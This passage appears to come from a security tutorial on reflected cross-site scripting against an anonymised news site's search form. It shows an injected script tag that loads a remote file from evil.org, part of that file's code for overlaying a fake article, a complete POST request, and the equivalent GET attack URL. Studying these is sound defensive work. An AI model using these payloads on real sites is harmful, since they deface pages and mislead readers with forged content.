news site, to make the attack interesting, we shall write our own fake news
article.
Due to the maximum length of any string we can send to the site, and the likely
length of the fake news article, we shall create a JavaScript include file (.js)
which we will load into the page using:
\'><script%20src%3dhttp://evil.org/faked.js></script>
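The length argument can be checked with a short Python sketch. The limit of 70 characters is an assumption taken from the MAXLENGTH="70" attribute on the search field shown earlier; the text does not state what limit the server itself enforces, and the helper name is hypothetical.

```python
from urllib.parse import unquote

# Assumption: the limit matches MAXLENGTH="70" on the search field shown
# earlier. The actual server-side limit is not stated in the text.
ASSUMED_MAX_LENGTH = 70


def fits_limit(encoded_value: str, limit: int = ASSUMED_MAX_LENGTH) -> bool:
    """Return True if the URL-decoded value is no longer than the limit."""
    return len(unquote(encoded_value)) <= limit


# The loader string from the text; a raw string keeps the backslash intact.
loader = r"\'><script%20src%3dhttp://evil.org/faked.js></script>"
decoded_length = len(unquote(loader))
print(decoded_length, fits_limit(loader))

# A stand-in for an inline article of 500 characters would not fit.
print(fits_limit("x" * 500))
```

Under that assumed limit the loader fits comfortably, while an article of any realistic length would not, which is why the content is moved into an external include file.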
In this example, the include file will use multiple document.write statements to
create the fake news article. The include file has several key features:
* Use of HTML <DIV> tags to position the content on the page. Doing so
allows the attacker to cover over existing content as they wish.
* Use of a table to keep all the article text together.
* Rewriting of the URL source field at the top of the browser.
* Rewriting of the browser status bar.
From the first few lines of the faked.js file:
var d = document;
d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">' +
        '<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');
So far, everything we have tested on the site has used the existing form to
submit the attacker's code. This submission is made by an HTTP POST request,
such as:
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache

dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>&newSearch=true&pro=IT&searchOption=articles
It is a simple process to convert the HTTP POST into a single URL. Unfortunately
for the anonymous news site, the web application does not differentiate between
the methods of receiving data. Thus the following attack URL allows the attacker
to place his own content on the site.
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>&newSearch=true&pro=IT
&searchOption=articles
